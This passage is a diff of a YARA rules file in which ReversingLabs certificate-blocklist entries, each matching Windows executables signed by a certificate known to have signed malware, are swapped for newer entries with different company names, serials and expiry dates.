+		logic_hash = "3c7d57a655f76a6e5ef6b0e770db7c91d0830b6b0b37caef5ef9e3e78ad1fd75"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21319,21 +45984,21 @@ rule REVERSINGLABS_Cert_Blocklist_5Da173Eb1Ac76340Ac058E1Ff4Bf5E1B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALISA LTD" and pe.signatures [ i ] . serial == "5d:a1:73:eb:1a:c7:63:40:ac:05:8e:1f:f4:bf:5e:1b" and 1550793600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HOLDING LA LTD" and ( pe.signatures [ i ] . serial == "00:d8:f5:15:71:5a:ef:fe:f0:a0:e4:e3:7f:16:c2:54:fa" or pe.signatures [ i ] . serial == "d8:f5:15:71:5a:ef:fe:f0:a0:e4:e3:7f:16:c2:54:fa" ) and 1619136000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1380A7Ccf2Bf36Bc496B00D8 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D79739187C585E453C00Afc11D77B523 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "dc473451-e1a9-53b4-acf6-9ff8036ecf31"
+		id = "ed427336-6833-5e09-8ebe-039c8cd50846"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16474-L16490"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "88708d7d139a9d6e92f78df460b527a1ae6a404d0bcccb801c8c8cb1263a46c6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9494-L9512"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6d6db87227d7be559afa67c4f2b65b01f26741fdf337d920241a633bb036426f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21343,21 +46008,21 @@ rule REVERSINGLABS_Cert_Blocklist_1380A7Ccf2Bf36Bc496B00D8 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "13:80:a7:cc:f2:bf:36:bc:49:6b:00:d8" and 1478069976 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAN MARINO INVESTMENTS PTY LTD" and ( pe.signatures [ i ] . serial == "00:d7:97:39:18:7c:58:5e:45:3c:00:af:c1:1d:77:b5:23" or pe.signatures [ i ] . serial == "d7:97:39:18:7c:58:5e:45:3c:00:af:c1:1d:77:b5:23" ) and 1631059200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_02Eaf27E6F1575E365Fc7Fe4E0Be43F7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_961Cecb0227845317549E9343A980E91 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5d1aad80-9444-5cc3-8ff4-b70fb089cda0"
+		id = "f319592a-5f08-5f2c-b840-5f897695e054"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16492-L16508"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "333a43bdfbc400727b8eae1efeb03484b959fc45ed6b8b0dd5e6a553fa27e87f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9514-L9532"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c74512e95e2d6aedecb1dbd30fac6fde40d1e9520c89b785519694d9bc9ba854"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21367,21 +46032,21 @@ rule REVERSINGLABS_Cert_Blocklist_02Eaf27E6F1575E365Fc7Fe4E0Be43F7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Theravada Solutions Ltd" and pe.signatures [ i ] . serial == "02:ea:f2:7e:6f:15:75:e3:65:fc:7f:e4:e0:be:43:f7" and 1562889600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AmiraCo Oy" and ( pe.signatures [ i ] . serial == "00:96:1c:ec:b0:22:78:45:31:75:49:e9:34:3a:98:0e:91" or pe.signatures [ i ] . serial == "96:1c:ec:b0:22:78:45:31:75:49:e9:34:3a:98:0e:91" ) and 1615248000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6Eb02Ac2Beb9611Ed57Eb12E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1Ef6392B2993A6F67578299659467Ea8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "64350364-fe74-54df-886d-1197146e00e7"
+		id = "123e5aed-0ef4-5146-81bb-5d455a9cf92e"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16510-L16526"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7f2a6c61ae82fec6829924d11190da776aebdd3d72c7e001fdc29b215649261c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9534-L9550"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f6b454a575ea7635d5edebffe3c9c83e95312ee33245e733987532348258733e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21391,21 +46056,21 @@ rule REVERSINGLABS_Cert_Blocklist_6Eb02Ac2Beb9611Ed57Eb12E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\x9D\\xA8\\xE5\\x87\\x8C\\xE4\\xBC\\xAF\\xE4\\xB9\\x90\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "6e:b0:2a:c2:be:b9:61:1e:d5:7e:b1:2e" and 1585023767 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALUSEN d. o. o." and pe.signatures [ i ] . serial == "1e:f6:39:2b:29:93:a6:f6:75:78:29:96:59:46:7e:a8" and 1618531200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_010000000001297Dba69Dd : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_A918455C0D4Da7Ca474F41F11A7Cf38C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f6a63e79-4dde-590f-ad65-ba9cc29ff48c"
+		id = "959b10fe-fbd0-5642-a5d9-4ac2e0474666"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16528-L16544"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "bbc3e740d5043d1811ff44c7366c69192fb78c95215b30fd4f4c782812ad591c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9552-L9570"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ea30d85c057f9363ce29d4c024097c50a8752dd2095481181322fe5d5c92bb4b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21415,21 +46080,21 @@ rule REVERSINGLABS_Cert_Blocklist_010000000001297Dba69Dd : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ROSSO INDEX K.K." and pe.signatures [ i ] . serial == "01:00:00:00:00:01:29:7d:ba:69:dd" and 1277713154 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MIDDRA INTERNATIONAL CORP." and ( pe.signatures [ i ] . serial == "00:a9:18:45:5c:0d:4d:a7:ca:47:4f:41:f1:1a:7c:f3:8c" or pe.signatures [ i ] . serial == "a9:18:45:5c:0d:4d:a7:ca:47:4f:41:f1:1a:7c:f3:8c" ) and 1618963200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7Def22Ef4C645B1Decfb36B6D3539Dbf : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_936Bc256D2057Ca9B9Ec3034C3Ed0Ee6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "aeb10a64-633c-5fc6-87af-360e1a402ad4"
+		id = "4dbe7db7-2f61-558c-a6dc-875ba87322c7"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16546-L16562"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "655ed87ee65f937c7cec95085fe612f8d733e0853c87aa50b4aa1fda9e5f7a5d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9572-L9590"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7e90c29bcfe4632e70b61a0cf2ab48a3de986bd5c6c730f64a363f4f3d79a3f4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21439,21 +46104,21 @@ rule REVERSINGLABS_Cert_Blocklist_7Def22Ef4C645B1Decfb36B6D3539Dbf : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "7d:ef:22:ef:4c:64:5b:1d:ec:fb:36:b6:d3:53:9d:bf" and 1474416000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SALES & MAINTENANCE LIMITED" and ( pe.signatures [ i ] . serial == "00:93:6b:c2:56:d2:05:7c:a9:b9:ec:30:34:c3:ed:0e:e6" or pe.signatures [ i ] . serial == "93:6b:c2:56:d2:05:7c:a9:b9:ec:30:34:c3:ed:0e:e6" ) and 1616889600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3E39C2Ccc494438Bb8C2560F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Afe8Fee94B41422E01E4897Bcd52D0A4 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "87477ad5-fc7e-5407-9c6e-bef3d4d8981d"
+		id = "83d08ca6-2a0b-5da3-8d53-7bf8bcc361cf"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16564-L16580"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3b4a55149b3895eeea5f96297d1fc9787eb74e2fcef8170148ef1a2ced334311"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9592-L9610"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "02c55b182bc9843334baed9c0a7cca2c88cd1de00ca9b47b10ec79b7a5acf9bb"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21463,21 +46128,21 @@ rule REVERSINGLABS_Cert_Blocklist_3E39C2Ccc494438Bb8C2560F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "3e:39:c2:cc:c4:94:43:8b:b8:c2:56:0f" and 1466142876 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TLGM ApS" and ( pe.signatures [ i ] . serial == "00:af:e8:fe:e9:4b:41:42:2e:01:e4:89:7b:cd:52:d0:a4" or pe.signatures [ i ] . serial == "af:e8:fe:e9:4b:41:42:2e:01:e4:89:7b:cd:52:d0:a4" ) and 1617062400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6E3B09F43C3A0Fd53B7D600F08Fae2B5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_718E89Ddb33257Ea77Ba74Be7F2Baf1D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "66025c6e-5d85-5660-87f1-3094a536bbe2"
+		id = "d173c2b2-2b76-521a-aac1-ae69fdf5b16b"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16582-L16598"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "86b06519858dce4b77cb870905297a1fd1c767053fd07c0b0469eb7fc3ba6b32"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9612-L9628"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2f0defa1e1d905d937677e96f2a0955d9737f6976596932cc093fdecfea3fdb0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21487,21 +46152,21 @@ rule REVERSINGLABS_Cert_Blocklist_6E3B09F43C3A0Fd53B7D600F08Fae2B5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Divisible Limited" and pe.signatures [ i ] . serial == "6e:3b:09:f4:3c:3a:0f:d5:3b:7d:60:0f:08:fa:e2:b5" and 1507248000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trap Capital ApS" and pe.signatures [ i ] . serial == "71:8e:89:dd:b3:32:57:ea:77:ba:74:be:7f:2b:af:1d" and 1635462927 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_21220646C639D62C16992F46 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4D3E38F4Aebbc32257450726B29Be117 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b80b1832-6bfa-555b-8462-cd17f9e5e0e1"
+		id = "173f89ca-e7b3-507b-96c1-325dd06210f8"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16600-L16616"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "87202c29867e6410d59c1e3b5ab09a24ebac5c68c61d7b932b91a91dcf3707e2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9630-L9646"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f618547942fcd9b3d1104cb5bedeecec8596fa7cc34bca838b6120085b305d73"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21511,21 +46176,21 @@ rule REVERSINGLABS_Cert_Blocklist_21220646C639D62C16992F46 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sivi Technology Limited" and pe.signatures [ i ] . serial == "21:22:06:46:c6:39:d6:2c:16:99:2f:46" and 1466130984 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "POLE & AERIAL FITNESS LIMITED" and pe.signatures [ i ] . serial == "4d:3e:38:f4:ae:bb:c3:22:57:45:07:26:b2:9b:e1:17" and 1636123882 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_738663F2C9E4Adb3Ad5306Aa5E7Cc548 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_8F4C49Dae1F1Ff0Ebe9104C6F73242Bd : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9fa41321-9736-5e67-b561-005b6d893e3f"
+		id = "b7731056-1674-5375-a3cb-69632670d6d9"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16618-L16634"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "518a22e31432ee42e6aceb861815f7f9e84f2430b7fb3a78b498e45c584584ab"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9648-L9666"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a8c99cc30b791a76fe3cd48184bf95ee47abb30bd200128efd2f5295ee18f7b1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21535,21 +46200,21 @@ rule REVERSINGLABS_Cert_Blocklist_738663F2C9E4Adb3Ad5306Aa5E7Cc548 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GIN-Konsalt" and pe.signatures [ i ] . serial == "73:86:63:f2:c9:e4:ad:b3:ad:53:06:aa:5e:7c:c5:48" and 1498435200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Contact Merger Holding ApS" and ( pe.signatures [ i ] . serial == "00:8f:4c:49:da:e1:f1:ff:0e:be:91:04:c6:f7:32:42:bd" or pe.signatures [ i ] . serial == "8f:4c:49:da:e1:f1:ff:0e:be:91:04:c6:f7:32:42:bd" ) and 1636039748 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4280F2C8Ce1D98E5F8Da7Ecb005Eeae5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ac3C05F1Cb9453De8E7110F589Fb32C0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "559dc522-bc23-5716-b8ad-9e9df102936b"
+		id = "2578655e-6420-5a67-9116-cab5cf5bc195"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16636-L16652"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4cc8f00a9704f595f3e48375942a19cd6f8d6c0e53afc932a61f5a4326be4bcb"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9668-L9686"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6328fd5dbb497c69ddc9151f85754669760b709ecbff3e8f320a40a62ca0dd2c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21559,21 +46224,21 @@ rule REVERSINGLABS_Cert_Blocklist_4280F2C8Ce1D98E5F8Da7Ecb005Eeae5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "42:80:f2:c8:ce:1d:98:e5:f8:da:7e:cb:00:5e:ea:e5" and 1476316800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRAIN BUILDING TEAM s.r.o." and ( pe.signatures [ i ] . serial == "00:ac:3c:05:f1:cb:94:53:de:8e:71:10:f5:89:fb:32:c0" or pe.signatures [ i ] . serial == "ac:3c:05:f1:cb:94:53:de:8e:71:10:f5:89:fb:32:c0" ) and 1635854205 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2946397Be9C5Ae44E95C99Af : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Fbb96A90B6718810311767Ca25Ab1E48 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "46bc3ade-544c-5ee1-8d5d-4b8a269120c9"
+		id = "77319b9c-6075-5ac7-958c-d76916873e85"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16654-L16670"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b7b4925482fcc47dea81eb3d84af31cc572f1b19080b98dda330b0bf6d7c80f4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9688-L9706"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "431e3364a42b272d9b71b92dee44cc185ef034a45a0b72bbda82cf7e9b29c355"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21583,21 +46248,21 @@ rule REVERSINGLABS_Cert_Blocklist_2946397Be9C5Ae44E95C99Af : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "29:46:39:7b:e9:c5:ae:44:e9:5c:99:af" and 1476092708 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rakurs LLC" and ( pe.signatures [ i ] . serial == "00:fb:b9:6a:90:b6:71:88:10:31:17:67:ca:25:ab:1e:48" or pe.signatures [ i ] . serial == "fb:b9:6a:90:b6:71:88:10:31:17:67:ca:25:ab:1e:48" ) and 1636046757 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2Df453588177Cf1C0C297Ff4 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Cfd38423Aef875A10B16644D058297E2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c3a18989-239e-56d7-b1c2-92895c02b7d8"
+		id = "f53e4f44-dde2-5f7a-8cab-71e91ff75d28"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L16672-L16688"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b0c82388fd87a89841d190ce4020cc5a2ea21c9d765ceca6bc25d64162479231"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L9708-L9726"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a2f67cbf31c9db2891892c31a7ed4ce7eccd834bfb10ae70f58e46f8e68e7c17"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21607,21 +46272,21 @@ rule REVERSINGLABS_Cert_Blocklist_2Df453588177Cf1C0C297Ff4 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shenzhen Yunhuitianxia Technology Co.,Ltd." and pe.signatures [ i ] . serial == "2d:f4:53:58:81:77:cf:1c:0c:29:7f:f4" and 1479735173 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRUST DANMARK ApS" and ( pe.signatures [ i ] . serial == "00:cf:d3:84:23:ae:f8:75:a1:0b:16:64:4d:05:82:97:e2" or pe.signatures [ i ] . serial == "cf:d3:84:23:ae:f8:75:a1:0b:16:64:4d:05:82:97:e2" ) and 1632884040 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0619C5E39A4Fc60A32F9B07F6A4Ca328 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_E6C05C5A2222Bf92818324A3A7374Ad3 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ae3ef9cf-4b67-5cb8-9c9b-3edb95da222c"
+		id = "2b5b79d8-e8fa-5593-b4c4-89af1f711152"
 		date = "2023-11-08"
 		modified = "2023-11-08"
